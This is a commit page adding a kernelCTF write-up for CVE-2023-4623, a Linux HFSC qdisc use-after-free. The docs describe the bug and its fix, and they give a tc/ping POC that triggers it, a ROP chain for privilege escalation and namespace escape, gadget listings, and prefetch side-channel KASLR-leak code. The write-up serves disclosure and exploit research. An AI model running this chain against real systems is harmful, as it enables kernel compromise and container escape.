Add kernelCTF CVE-2023-4623_lts_cos (#110)

* Add CVE-2023-4623_lts_cos
* Remove unnecessary function
* Add comments
* Fix side-channel reliability
* Add docs
* Update Makefile
* Use separate KASLR leak
* Make requested changes
google · Aug 2, 2024 · 361a3fb
1 parent 0226d51

Showing 11 changed files with 1,232 additions and 0 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md
@@ -0,0 +1,184 @@
+## Overview
+
+The vulnerability leads to a use-after-free on an `hfsc_class` object in `hfsc_dequeue()`. By replacing the vulnerable `hfsc_class` with a crafted `simple_xattr`, we can make `hfsc_dequeue()` perform a write-what-where. This is used to overwrite a function pointer in the kernel's `.data` section that is then called to execute a ROP chain and escape the namespace. The kernel base slide, which is needed to determine the write primitive's target address and ROP gadget addresses, is leaked using a prefetch timing side-channel.
+
+## Setup
+
+The exploit gains `CAP_NET_ADMIN` by becoming root in a new user namespace and then creating a network namespace owned by that user namespace:
+
+```c
+unshare(CLONE_NEWUSER);
+unshare(CLONE_NEWNET);
+```
+
+A temporary file is opened so that extended attributes can be attached to it for the `simple_xattr` spray:
+
+```c
+xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664);
+```
+
+If the kernel base is not provided, `kaslr_leak()` leaks it using a prefetch side-channel (see final section for details).
+
+## Triggering the Vulnerability
+
+To trigger the vulnerability, we need to set up an HFSC qdisc and send packets to it. We will need to open two types of sockets: an `AF_NETLINK` socket for configuring the qdisc and an `AF_INET` socket for enqueueing packets at the qdisc. The qdisc is set up on `lo` by sending preconstructed messages to the Netlink socket. The `tf_msg` struct is used to represent the Netlink route messages, which are constructed in `init_nl_msgs()`. The following sequence of messages is sent:
+
+- `if_up_msg` sets `lo` up so that packets can be sent to the qdisc.
+- `newqd_msg` attaches an HFSC qdisc to `lo`.
+- `new_rsc_msg` adds a class with an RSC (real-time service curve) to the qdisc as a child of the root class.
+- `new_fsc_msg` adds a class with an FSC (link-sharing service curve) to the qdisc as a child of the RSC class.
+- At this point an `AF_INET` socket is opened and written to with `loopback_send()`. The message will be enqueued in the FSC class, causing the RSC class to be mistakenly added to the root class's `vt_tree`.
+- `delc_msg` deletes the FSC class, then another `delc_msg` deletes the RSC class, leaving a dangling pointer to the underlying `hfsc_class` object in the root class's `vt_tree`.
+
+## Write-What-Where
+
+The use-after-free is reached via [`hfsc_dequeue()`](https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570 "https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570"), which calls `vttree_get_minvt()`:
+
+```c
+static struct hfsc_class *
+vttree_get_minvt(struct hfsc_class *cl, u64 cur_time)
+{
+    /* if root-class's cfmin is bigger than cur_time nothing to do */
+    if (cl->cl_cfmin > cur_time)
+        return NULL;
+
+    while (cl->level > 0) {
+        cl = vttree_firstfit(cl, cur_time);
+        if (cl == NULL)
+            return NULL;
+        /*
+         * update parent's cl_cvtmin.
+         */
+        if (cl->cl_parent->cl_cvtmin < cl->cl_vt)
+            cl->cl_parent->cl_cvtmin = cl->cl_vt;
+    }
+    return cl;
+}
+```
+
+The loop will eventually assign our dangling pointer to `cl`. Then the line
+```c
+cl->cl_parent->cl_cvtmin = cl->cl_vt;
+```
+gives us an 8-byte write-what-where primitive, with the restriction that the write only happens if the new value is greater than the value it replaces (both are `u64`, so the comparison is unsigned). This primitive is used to overwrite the `qfq_qdisc_ops.change()` function pointer in the kernel's `.data` section with a JOP gadget. Since the QFQ qdisc does not define a change function, `qfq_qdisc_ops.change()` is initially `NULL`, so any non-zero value can be written to it.
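+
+The constraint on this primitive can be modeled in a few lines of user-space C. This is a hypothetical sketch: `conditional_write()` is not a function in the exploit or the kernel; it only mirrors the guarded assignment in `vttree_get_minvt()` to show why an initially `NULL` pointer is a convenient target.
+
+```c
+#include <assert.h>
+#include <stdint.h>
+#include <stdio.h>
+
+/* Hypothetical model of the guarded store in vttree_get_minvt():
+ *     if (cl->cl_parent->cl_cvtmin < cl->cl_vt)
+ *         cl->cl_parent->cl_cvtmin = cl->cl_vt;
+ * 'target' stands in for &cl->cl_parent->cl_cvtmin and 'value' for cl->cl_vt.
+ * Returns 1 if the store happened and 0 if it was skipped. */
+static int conditional_write(uint64_t *target, uint64_t value)
+{
+    if (*target < value) {  /* unsigned 64-bit comparison, like the kernel's u64 */
+        *target = value;
+        return 1;
+    }
+    return 0;
+}
+
+int main(void)
+{
+    uint64_t slot = 0;  /* e.g. a function pointer that is initially NULL */
+
+    /* Any non-zero value is greater than 0, so the first store succeeds. */
+    int wrote = conditional_write(&slot, 0x1234);
+    assert(wrote == 1 && slot == 0x1234);
+
+    /* A smaller value is silently dropped: the primitive can only increase a slot. */
+    wrote = conditional_write(&slot, 0x10);
+    assert(wrote == 0 && slot == 0x1234);
+
+    printf("slot = %#llx\n", (unsigned long long)slot);
+    return 0;
+}
+```
+
+A target that already holds a large value (such as an existing kernel text pointer) could only be replaced by an even larger one, which is why a `NULL` slot is the easier choice.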
+
+A `simple_xattr` is used to store the target address and value. The exploit uses `spray_simple_xattrs()` to add attributes to a temporary file, which sprays `simple_xattr` objects into the `kmalloc-1024` cache, where the vulnerable `hfsc_class` is located.
+
+The `value` field of `simple_xattr` is filled with a fake `hfsc_class`. The following fields have to be faked:
+
+- `cl_parent`: The address to write to minus `offsetof(struct hfsc_class, cl_cvtmin)`, so that `cl_parent->cl_cvtmin` aliases the target. Set so that the target is the `qfq_qdisc_ops.change()` pointer.
+- `cl_vt`: The 8-byte value to write. Set to the address of a JOP gadget.
+- `cl_f`: Set to zero to satisfy the `p->cl_f <= cur_time` condition in `vttree_firstfit()`.
+- `level`: Set to a non-zero value to prevent `vttree_get_minvt()` from returning the dangling pointer and causing further use-after-frees.
+- `vt_node`: This is the red-black tree node through which the vulnerable class is accessed. We make it a black node with `NULL` children to prevent crashes in `init_vf()` and `vttree_get_minvt()`:
+  - `vt_node.__rb_parent_color`: Set to 1, which colors the node black and gives it a `NULL` parent pointer.
+  - `vt_node.rb_right`: Set to `NULL` so that it is not dereferenced.
+  - `vt_node.rb_left`: Set to `NULL` so that it is not dereferenced.
+- `cf_node`: There is another dangling pointer to the vulnerable class from the root class's `cf_tree`. This node is filled in the same way as `vt_node` to prevent a crash in `init_vf()`, but is not otherwise relevant.
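+
+The `cl_parent` arithmetic and the `vt_node` encoding can be illustrated with mock structures. This sketch is hypothetical: `struct mock_class` and its field order are invented and do not match the real `hfsc_class` layout, and `struct mock_rb_node` only copies the shape of the kernel's `struct rb_node` (the low bit of `__rb_parent_color` is the color, black = 1, and the remaining bits hold the parent pointer).
+
+```c
+#include <assert.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+
+/* Same shape as the kernel's struct rb_node. */
+struct mock_rb_node {
+    unsigned long __rb_parent_color;  /* parent pointer | color bit */
+    struct mock_rb_node *rb_right;
+    struct mock_rb_node *rb_left;
+};
+#define MOCK_RB_BLACK 1UL
+
+/* Hypothetical stand-in for struct hfsc_class; field order and padding
+ * are invented and do NOT reflect the real layout. */
+struct mock_class {
+    uint64_t other_fields[6];
+    struct mock_class *cl_parent;
+    uint64_t cl_vt;
+    uint64_t cl_cvtmin;
+    int level;
+    struct mock_rb_node vt_node;
+};
+
+/* Value for the fake cl_parent so that cl_parent->cl_cvtmin lands on target_addr. */
+static uintptr_t fake_parent_for(uintptr_t target_addr)
+{
+    return target_addr - offsetof(struct mock_class, cl_cvtmin);
+}
+
+/* Decoders mirroring the kernel's rb_parent() and __rb_color(). */
+static uintptr_t node_parent(const struct mock_rb_node *n)
+{
+    return n->__rb_parent_color & ~3UL;
+}
+static unsigned long node_color(const struct mock_rb_node *n)
+{
+    return n->__rb_parent_color & 1UL;
+}
+
+int main(void)
+{
+    struct mock_class victim = {0};  /* object whose cl_cvtmin is the write target */
+    struct mock_class fake = {0};    /* the "sprayed" fake class */
+
+    fake.cl_parent = (struct mock_class *)fake_parent_for((uintptr_t)&victim.cl_cvtmin);
+    assert(fake.cl_parent == &victim);  /* the store would hit victim.cl_cvtmin */
+
+    fake.cl_vt = 0x1234;  /* placeholder value to write */
+    fake.level = 1;       /* non-zero: the walk does not return this class */
+
+    /* A lone black node: no parent, no children. */
+    fake.vt_node.__rb_parent_color = MOCK_RB_BLACK;
+    fake.vt_node.rb_left = NULL;
+    fake.vt_node.rb_right = NULL;
+    assert(node_color(&fake.vt_node) == MOCK_RB_BLACK);
+    assert(node_parent(&fake.vt_node) == 0);
+
+    printf("cl_cvtmin offset in the mock layout: %zu\n",
+           offsetof(struct mock_class, cl_cvtmin));
+    return 0;
+}
+```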
+
+Once a `simple_xattr` has been allocated over the vulnerable `hfsc_class`, another FSC class is created with `new_fsc_msg` so that the qdisc has somewhere to enqueue packets (`hfsc_dequeue()` returns early if the qdisc is empty). The write-what-where in `hfsc_dequeue()` is then triggered by sending an `AF_INET` packet with the `loopback_send()` helper function.
+
+## ROP Chain
+
+Now that `qfq_qdisc_ops.change()` has been overwritten, it can be called by sending the `new_qfq_qdisc` message to a Netlink socket. The kernel then calls the overwritten pointer from `qdisc_change()` with `rsi` pointing into the middle of the sent message. The data around `rsi` is attacker-controlled and contains the ROP chain.
+
+The `new_qfq_qdisc` message is constructed with two consecutive `TCA_OPTIONS` attributes, each of which consists of a 4-byte `rtattr` header followed by a data buffer. When the overwritten function is called, `rsi` will point to the second attribute, whose data buffer stores a ROP chain copied from `rop_buf`. The preceding attribute's buffer contains a single gadget, copied from `jop_buf` and found at `rsi - 0x70` when the chain is executed.
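+
+The attribute layout can be checked against the uapi netlink macros. A minimal sketch, assuming `<linux/rtnetlink.h>` is available: `put_attr()` is a hypothetical helper (not the exploit's code), and the 0x40-byte placeholder payloads are not the sizes the exploit uses. It packs two consecutive `TCA_OPTIONS` attributes and shows that each payload starts right after a 4-byte header.
+
+```c
+#include <assert.h>
+#include <stdio.h>
+#include <string.h>
+#include <linux/rtnetlink.h>
+
+/* Hypothetical helper: write one rtattr (4-byte header + payload) at buf + off
+ * and return the aligned offset where the next attribute starts. */
+static size_t put_attr(unsigned char *buf, size_t off, unsigned short type,
+                       const void *data, size_t len)
+{
+    struct rtattr *rta = (struct rtattr *)(buf + off);
+    rta->rta_type = type;
+    rta->rta_len = RTA_LENGTH(len);     /* header + payload, unpadded */
+    memcpy(RTA_DATA(rta), data, len);
+    return off + RTA_SPACE(len);        /* padded to RTA_ALIGNTO (4 bytes) */
+}
+
+int main(void)
+{
+    _Alignas(8) unsigned char buf[256] = {0};
+    unsigned char first[0x40], second[0x40];
+    memset(first, 0x41, sizeof(first));    /* placeholder payloads */
+    memset(second, 0x42, sizeof(second));
+
+    size_t off2 = put_attr(buf, 0, TCA_OPTIONS, first, sizeof(first));
+    size_t end = put_attr(buf, off2, TCA_OPTIONS, second, sizeof(second));
+
+    /* The header is 4 bytes, so each payload begins 4 bytes into its attribute. */
+    assert(sizeof(struct rtattr) == 4);
+    assert(off2 == RTA_SPACE(sizeof(first)));
+    assert((unsigned char *)RTA_DATA((struct rtattr *)(buf + off2)) == buf + off2 + 4);
+
+    printf("second attribute at +%zu, payload at +%zu, end at +%zu\n",
+           off2, off2 + 4, end);
+    return 0;
+}
+```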
+
+The chain starts by calling the JOP gadget stored at `qfq_qdisc_ops.change()`:
+```
+push rsi ; jmp qword ptr [rsi - 0x70]
+```
+The gadget at `rsi - 0x70` then completes the stack pivot: `pop rsp` loads the pushed `rsi` into `rsp`, and `pop rbx` consumes the first 8 bytes at `rsi` (which hold the `rtattr` header), so execution continues with the ROP chain at `rsi + 8`:
+```
+pop rsp ; pop rbx ; jmp __x86_return_thunk             // rsi - 0x70
+```
+The ROP chain starts by copying `rdi` into `rbx`, which restores `rbx`'s previous value:
+```
+push rdi ; pop rbx ; pop rbp ; jmp __x86_return_thunk  // rsi + 0x8
+0
+```
+This is necessary because the chain eventually returns to the kernel stack and `rbx` is callee-saved. After this, the usual privilege escalation and namespace escape are performed using `commit_creds()` and `switch_task_namespaces()`:
+```
+pop rdi ; jmp __x86_return_thunk
+0
+prepare_kernel_cred()
+pop rcx ; jmp __x86_return_thunk
+commit_creds()
+mov rdi, rax ; jmp __x86_indirect_thunk_rcx
+pop rdi ; jmp __x86_return_thunk
+1
+find_task_by_vpid()
+pop rsi ; jmp __x86_return_thunk
+init_ns_proxy
+pop rcx ; jmp __x86_return_thunk
+switch_task_namespaces()
+mov rdi, rax ; jmp __x86_indirect_thunk_rcx
+```
+
+The ROP chain ends by pivoting back to the previous frame on the kernel stack. A kernel stack pointer can be read from `r14` on the LTS instance and from `r13` on the COS instance. An offset of `-384` (LTS) or `-368` (COS) is added to this pointer to get the location of the target frame. Here are the gadgets for LTS:
+
+```
+mov rax, r14 ; pop r14 ; jmp __x86_return_thunk
+0
+pop rdx ; jmp __x86_return_thunk
+pop r14 ; jmp __x86_return_thunk
+push rax ; jmp __x86_indirect_thunk_rdx
+pop rcx ; jmp __x86_return_thunk
+-384
+add rax, rcx ; jmp __x86_return_thunk
+pop rdx ; jmp __x86_return_thunk
+pop rsp ; jmp __x86_return_thunk
+push rax ; jmp __x86_indirect_thunk_rdx
+```
+and COS:
+```
+mov rax, r13 ; pop r13 ; pop rbp ; jmp __x86_return_thunk
+0
+0
+pop rsi ; jmp __x86_return_thunk
+-368
+add rax, rsi ; jmp __x86_return_thunk
+pop rdx ; jmp __x86_return_thunk
+pop rsp ; jmp __x86_return_thunk
+push rax ; jmp __x86_indirect_thunk_rdx
+```
+## Infoleak with Prefetch Timing Side-channel
+
+A simple implementation of the prefetch timing side-channel (described in this [P0 blog post](https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html "https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html") and originally from this [paper](https://gruss.cc/files/prefetch.pdf "https://gruss.cc/files/prefetch.pdf") by Daniel Gruss et al.) is used to bypass KASLR. This side-channel exploits differences in the execution time of `prefetch` instructions that depend on whether the target address is mapped and on the cache state.
+
+Addresses that are mapped and have been recently accessed have a faster prefetch time than unmapped addresses (`prefetch` itself does not count as an access here). We access `sys_getuid()` by calling `getuid()` and then measure prefetch times for all possible locations of `sys_getuid()`. The target instance's kernel base is always located at a `0x1000000`-aligned address between `0xffffffff81000000` and `0xffffffffbb000000`, so there are 59 candidate addresses to test.
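+
+The candidate count follows from the range and step size: `0xbb - 0x81 = 0x3a = 58` steps of `0x1000000`, plus one for the inclusive upper bound. A quick check, reusing the bounds that `kaslr_leak()` defines (as unsigned constants here; `candidate_count()` is a hypothetical helper):
+
+```c
+#include <assert.h>
+#include <stdio.h>
+
+#define MIN_STEXT 0xffffffff81000000UL
+#define MAX_STEXT 0xffffffffbb000000UL
+#define BASE_INC  0x1000000UL
+
+/* Number of BASE_INC-aligned kernel base candidates in [MIN_STEXT, MAX_STEXT]. */
+static unsigned long candidate_count(void)
+{
+    return (MAX_STEXT - MIN_STEXT) / BASE_INC + 1;
+}
+
+int main(void)
+{
+    /* Enumerate the candidates the same way the scan loop does. */
+    unsigned long n = 0;
+    for (unsigned long base = MIN_STEXT; base <= MAX_STEXT; base += BASE_INC)
+        n++;
+
+    assert(n == candidate_count());
+    printf("%lu candidates\n", n);  /* prints "59 candidates" */
+    return 0;
+}
+```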
+
+The attack first finds the minimum prefetch time `min` for the unmapped address `0xffffffff80000000`. Prefetch times for other unmapped addresses will likely be greater than or equal to `min`, so any address with a faster prefetch time is assumed to be mapped. The lowest mapped address found this way is taken to be the kernel base.
+
+
+
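+```c
+#define MIN_STEXT 0xffffffff81000000
+#define MAX_STEXT 0xffffffffbb000000
+#define BASE_INC 0x1000000
+
+// onlyreload() (prefetch timing) and SYS_GETUID (offset of sys_getuid()
+// from the kernel base) are defined elsewhere in the exploit.
+long kaslr_leak (int tries1, int tries2) {
+    // Kernel addresses are negative as signed longs and -1 is greater than
+    // all of them, so base = -1 means "not found" and is returned if no
+    // candidate beats the baseline.
+    long base = -1, addr;
+    size_t time;
+    size_t min = -1;    // SIZE_MAX
+
+    // Baseline: fastest prefetch time seen for a known-unmapped address.
+    addr = 0xffffffff80000000;
+    for (int i = 0; i < tries1; i++) {
+        time = onlyreload(addr);
+        min = min < time ? min : time;
+    }
+
+    // Any candidate faster than the baseline is treated as mapped; keep the
+    // lowest such address as the kernel base.
+    for (int i = 0; i < tries2; i++) {
+        for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) {
+            time = onlyreload(addr + SYS_GETUID);
+            if (time < min && addr < base) {
+                base = addr;
+            }
+        }
+    }
+    return base;
+}
+```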
+
+The prefetch timing assembly code in `onlyreload()` is taken from Daniel Gruss's [repository](https://github.com/IAIK/prefetch "https://github.com/IAIK/prefetch") with `cpuid` replaced by `mfence` as suggested in the P0 blog post.
+
+The original exploit did not preload the target address, but the leak will not work reliably without this on the current server (likely due to increased cache activity).
+
+This implementation of the side-channel works on the Intel Xeon CPU used by the live instance but not on the AMD CPU used by the exploit_repro instance, since on AMD there is no timing difference between the two cases it distinguishes.
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md
@@ -0,0 +1,35 @@
+## Vulnerability Details
+
+There is a use-after-free in the traffic control system's HFSC qdisc when an HFSC class with link-sharing has a parent without link-sharing. When a packet is enqueued at the child class, `init_vf()` will call `vttree_insert()` on the parent. However, when the packet is dequeued, `vttree_remove()` will be skipped in `update_vf()` since the parent does not have the `HFSC_FSC` flag set. The parent therefore stays in its own parent's `vt_tree`, and once the parent class is deleted this leaves a dangling pointer which can be exploited to cause a use-after-free and achieve privilege escalation.
+
+The vulnerability has been present since the HFSC qdisc was introduced in kernel version 2.6.3. It was fixed in version 6.5 with commit `b3d26c5702c7 ("net/sched: sch_hfsc: Ensure inner classes have fsc curve")`. This commit made it impossible for classes without link-sharing curves to become parents, since only inner classes with link-sharing curves are meaningful in HFSC.
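+
+The bookkeeping mismatch and the effect of the fix can be reproduced in a toy user-space model. This is a deliberately simplified, hypothetical sketch, not the kernel's code: `struct toy_class`, `toy_enqueue()`, `toy_dequeue()` and `toy_parent_ok()` are invented names, tree membership is reduced to an `on_vt_tree` flag, and only the asymmetry described above is modeled (ancestors inserted on enqueue regardless of flags, removal on dequeue only when `HFSC_FSC` is set), plus a parent check in the spirit of the fix.
+
+```c
+#include <assert.h>
+#include <stdbool.h>
+#include <stdio.h>
+
+#define TOY_HFSC_RSC 0x1  /* real-time curve */
+#define TOY_HFSC_FSC 0x2  /* link-sharing curve */
+
+struct toy_class {
+    const char *name;
+    unsigned int flags;
+    struct toy_class *parent;
+    bool on_vt_tree;  /* stands in for membership in the parent's vt_tree */
+};
+
+/* Enqueue side (like init_vf()): every non-root ancestor is inserted into
+ * its parent's vt_tree, regardless of its own flags. */
+static void toy_enqueue(struct toy_class *cl)
+{
+    for (; cl->parent != NULL; cl = cl->parent)
+        cl->on_vt_tree = true;
+}
+
+/* Dequeue side (like update_vf()): classes without FSC are skipped, so they
+ * are never removed from their parent's vt_tree. */
+static void toy_dequeue(struct toy_class *cl)
+{
+    for (; cl->parent != NULL; cl = cl->parent) {
+        if (!(cl->flags & TOY_HFSC_FSC))
+            continue;
+        cl->on_vt_tree = false;
+    }
+}
+
+/* Check in the spirit of the fix: only the root or classes with a
+ * link-sharing curve may become parents. */
+static bool toy_parent_ok(const struct toy_class *parent)
+{
+    return parent->parent == NULL || (parent->flags & TOY_HFSC_FSC);
+}
+
+int main(void)
+{
+    struct toy_class root = { "root", 0, NULL, false };
+    struct toy_class rt = { "1:1 (rt only)", TOY_HFSC_RSC, &root, false };
+    struct toy_class ls = { "1:2 (ls)", TOY_HFSC_FSC, &rt, false };
+
+    toy_enqueue(&ls);  /* 1:2 and 1:1 are both inserted */
+    toy_dequeue(&ls);  /* only 1:2 is removed */
+
+    /* 1:1 stays linked into root's tree; deleting it would leave a dangling entry. */
+    assert(rt.on_vt_tree && !ls.on_vt_tree);
+
+    /* With the parent check, 1:2 could not have been created under 1:1. */
+    assert(!toy_parent_ok(&rt));
+    assert(toy_parent_ok(&root));
+
+    printf("stale vt_tree entry left for %s\n", rt.name);
+    return 0;
+}
+```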
+
+Triggering the vulnerability requires `CONFIG_NET_SCH_HFSC` to be enabled in the kernel configuration. The user must have the `CAP_NET_ADMIN` capability to trigger the vulnerability, which can be gained with access to unprivileged user namespaces. Disabling unprivileged user namespaces prevents the vulnerability from being exploited for privilege escalation.
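+
+Whether a system still exposes this path can be probed by attempting the same `unshare(CLONE_NEWUSER)` call the exploit makes, in a throwaway child process. A minimal sketch: `userns_available()` is a hypothetical helper, the result is only meaningful when run as an unprivileged user, and a failure may also come from seccomp filters or namespace limits rather than a disabled sysctl.
+
+```c
+#define _GNU_SOURCE
+#include <assert.h>
+#include <sched.h>
+#include <stdio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+/* Returns 1 if the calling user can create a user namespace, 0 if not,
+ * and -1 if the probe itself failed. The attempt runs in a forked child
+ * so the caller's namespaces are left untouched. */
+static int userns_available(void)
+{
+    pid_t pid = fork();
+    if (pid < 0)
+        return -1;
+    if (pid == 0)
+        _exit(unshare(CLONE_NEWUSER) == 0 ? 0 : 1);
+
+    int status;
+    if (waitpid(pid, &status, 0) < 0)
+        return -1;
+    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
+}
+
+int main(void)
+{
+    int r = userns_available();
+    if (r < 0)
+        perror("probe");
+    else
+        printf("unprivileged user namespaces: %s\n", r ? "available" : "unavailable");
+    return 0;
+}
+```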
+
+## POC
+```sh
+# Set lo up
+ip link set lo up
+
+# Create the HFSC qdisc and root class.
+tc qdisc add dev lo parent root handle 1: hfsc def 2
+
+# Add a real-time class as a child of root class.
+tc class add dev lo parent 1: classid 1:1 hfsc rt umax 1 dmax 1 rate 1
+
+# Add a link-sharing class as a child of the real-time class.
+tc class add dev lo parent 1:1 classid 1:2 hfsc ls umax 1 dmax 1 rate 1
+
+# Enqueue packet at link-sharing class, which calls init_vf() on it.
+ping -c1 localhost
+
+# Delete the parent and child classes, leaving a dangling pointer.
+tc class del dev lo classid 1:2
+tc class del dev lo classid 1:1
+
+# Add a link-sharing class to enqueue packets to (if the queue is empty, hfsc_dequeue() will return before reaching the UaF)
+tc class add dev lo parent 1: classid 1:2 hfsc ls umax 1 dmax 1 rate 1
+
+# Trigger use-after-free in hfsc_dequeue()
+ping -c1 localhost
+```
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile
@@ -0,0 +1,6 @@
+CFLAGS = -Wno-incompatible-pointer-types -Wno-format -static
+
+exploit: exploit.c
+
+run:
+	./exploit
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit